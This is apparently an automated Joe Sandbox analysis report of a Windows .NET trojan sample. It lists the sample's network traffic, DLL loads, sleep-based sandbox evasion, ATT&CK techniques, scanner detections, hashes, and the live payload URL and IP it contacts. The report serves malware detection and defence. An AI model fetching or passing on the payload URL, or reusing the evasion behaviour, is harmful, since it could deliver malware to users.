Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50171
Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50173
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50172
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50206 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50191 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50179 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49907 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:50149 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:50181 version: TLS 1.2
Source: 3j7f6Bv4FT.exe, 00000000.00000000.1725299827.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOygribcb.exe2 vs 3j7f6Bv4FT.exe
Source: 3j7f6Bv4FT.exe, 00000000.00000002.3577581146.000000000158E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 3j7f6Bv4FT.exe
Source: 3j7f6Bv4FT.exeBinary or memory string: OriginalFilenameOygribcb.exe2 vs 3j7f6Bv4FT.exe
Source: 3j7f6Bv4FT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal56.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeMutant created: NULL
Source: 3j7f6Bv4FT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 3j7f6Bv4FT.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 3j7f6Bv4FT.exeVirustotal: Detection: 75%
Source: 3j7f6Bv4FT.exeReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeSection loaded: gpapi.dllJump to behavior
Source: 3j7f6Bv4FT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 3j7f6Bv4FT.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeMemory allocated: 1780000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeMemory allocated: 3350000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeMemory allocated: 5350000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeMemory allocated: 64E0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeMemory allocated: 1860000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exe TID: 7408Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exe TID: 7408Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeThread delayed: delay time: 600000Jump to behavior
Source: 3j7f6Bv4FT.exe, 00000000.00000002.3577581146.00000000015F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeQueries volume information: C:\Users\user\Desktop\3j7f6Bv4FT.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3j7f6Bv4FT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
OS Credential Dumping1
Query Registry
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts31
Virtualization/Sandbox Evasion
LSASS Memory1
Security Software Discovery
Remote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS12
System Information Discovery
Distributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
3j7f6Bv4FT.exe75%VirustotalBrowse
3j7f6Bv4FT.exe68%ReversingLabsWin32.Trojan.Leonem
3j7f6Bv4FT.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://balkancelikdovme.com/eyiiam/Ryfuqzdi.datd0%Avira URL Cloudsafe
https://balkancelikdovme.com/eyiiam/Ryfuqzdi.dattocqt550%Avira URL Cloudsafe
https://balkancelikdovme.com0%Avira URL Cloudsafe
https://balkancelikdovme.com/eyiiam/Ryfuqzdi.dat0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
balkancelikdovme.com
185.181.116.217
truefalse
    high
    NameMaliciousAntivirus DetectionReputation
    https://balkancelikdovme.com/eyiiam/Ryfuqzdi.datfalse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://balkancelikdovme.com/eyiiam/Ryfuqzdi.datd3j7f6Bv4FT.exe, 00000000.00000002.3579878832.0000000006845000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name3j7f6Bv4FT.exe, 00000000.00000002.3577970719.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      https://balkancelikdovme.com3j7f6Bv4FT.exe, 00000000.00000002.3577970719.0000000003351000.00000004.00000800.00020000.00000000.sdmp, 3j7f6Bv4FT.exe, 00000000.00000002.3579878832.0000000006845000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://balkancelikdovme.com/eyiiam/Ryfuqzdi.dattocqt553j7f6Bv4FT.exe, 00000000.00000002.3577970719.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      185.181.116.217
      balkancelikdovme.comUnited Kingdom
      29017GYRONGBfalse
      Joe Sandbox version:42.0.0 Malachite
      Analysis ID:1588236
      Start date and time:2025-01-10 23:03:51 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 5m 25s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Run name:Run with higher sleep bypass
      Number of analysed new started processes analysed:5
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:3j7f6Bv4FT.exe
      renamed because original name is a hash value
      Original Sample Name:7f87122d3915b3b17a5c8b98fcdaf34bc32690e14c3a1e16ee9ae2f11e0436e0.exe
      Detection:MAL
      Classification:mal56.winEXE@1/0@1/1
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 10
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
      • Execution Graph export aborted for target 3j7f6Bv4FT.exe, PID 7336 because it is empty
      • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtDeviceIoControlFile calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtReadVirtualMemory calls found.
      No simulations
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      185.181.116.217r096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
      • balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk
      r096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
      • balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      balkancelikdovme.comiRmpdWgpoF.exeGet hashmaliciousUnknownBrowse
      • 185.181.116.217
      iRmpdWgpoF.exeGet hashmaliciousUnknownBrowse
      • 185.181.116.217
      #U00d6deme tavsiyesi.pdf.exeGet hashmaliciousUnknownBrowse
      • 185.181.116.217
      #U00d6deme tavsiyesi.pdf.exeGet hashmaliciousUnknownBrowse
      • 185.181.116.217
      new_order_xlsx.exeGet hashmaliciousDBatLoaderBrowse
      • 185.181.116.217
      new_order_xlsx.exeGet hashmaliciousDBatLoaderBrowse
      • 185.181.116.217
      r096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
      • 185.181.116.217
      r096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
      • 185.181.116.217
      0vJrK0NCd1.exeGet hashmaliciousRemcos, DBatLoader, FloodFixBrowse
      • 185.181.116.217
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      GYRONGBiRmpdWgpoF.exeGet hashmaliciousUnknownBrowse
      • 185.181.116.217
      iRmpdWgpoF.exeGet hashmaliciousUnknownBrowse
      • 185.181.116.217
      #U00d6deme tavsiyesi.pdf.exeGet hashmaliciousUnknownBrowse
      • 185.181.116.217
      #U00d6deme tavsiyesi.pdf.exeGet hashmaliciousUnknownBrowse
      • 185.181.116.217
      jew.m68k.elfGet hashmaliciousUnknownBrowse
      • 83.223.101.8
      HhaL0xmHfu.elfGet hashmaliciousMiraiBrowse
      • 89.145.115.227
      3Lf408k9mg.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
      • 91.197.228.89
      file.exeGet hashmaliciousSystemBCBrowse
      • 83.223.113.41
      NJh7IrK6IZ.elfGet hashmaliciousMiraiBrowse
      • 83.223.101.9
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      3b5074b1b5d032e5620f69f9f700ff0eb5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
      • 185.181.116.217
      9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
      • 185.181.116.217
      iRmpdWgpoF.exeGet hashmaliciousUnknownBrowse
      • 185.181.116.217
      6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
      • 185.181.116.217
      iRmpdWgpoF.exeGet hashmaliciousUnknownBrowse
      • 185.181.116.217
      3pwbTZtiDu.exeGet hashmaliciousUnknownBrowse
      • 185.181.116.217
      JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
      • 185.181.116.217
      87J30ulb4q.exeGet hashmaliciousUnknownBrowse
      • 185.181.116.217
      lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
      • 185.181.116.217
      No context
      No created / dropped files found
      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
      Entropy (8bit):4.377490821039883
      TrID:
      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
      • Win32 Executable (generic) a (10002005/4) 49.78%
      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
      • Generic Win/DOS Executable (2004/3) 0.01%
      • DOS Executable Generic (2002/1) 0.01%
      File name:3j7f6Bv4FT.exe
      File size:6'144 bytes
      MD5:86f78b16d04b2fded7566faecd535063
      SHA1:d581d26908dc87771f708c0e9bcb0973015b6491
      SHA256:7f87122d3915b3b17a5c8b98fcdaf34bc32690e14c3a1e16ee9ae2f11e0436e0
      SHA512:2f4678163fdbd37df483e8dc7ef974064bfdf0802799829d70ead8e3aaf708c3e940ed6ffb7c088115c320c07ea777e4d345c2279925923efb3f1710c0e524a6
      SSDEEP:48:6q1E+J19qfxaKSnPSCBN8sSz9vz6zYSw9/NOjWYRJBcLVp2h0o+hHsgO+z0CtaxV:3eO9VhN0nujWArchp9LHK+zOR8zNt
      TLSH:E4C1A62193C95B37E9734B7A9EF3A3D10378F740A8A7CB5E28C4160B5D0BB540A61B70
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Wg............................v,... ...@....@.. ....................................`................................
      Icon Hash:90cececece8e8eb0
      Entrypoint:0x402c76
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
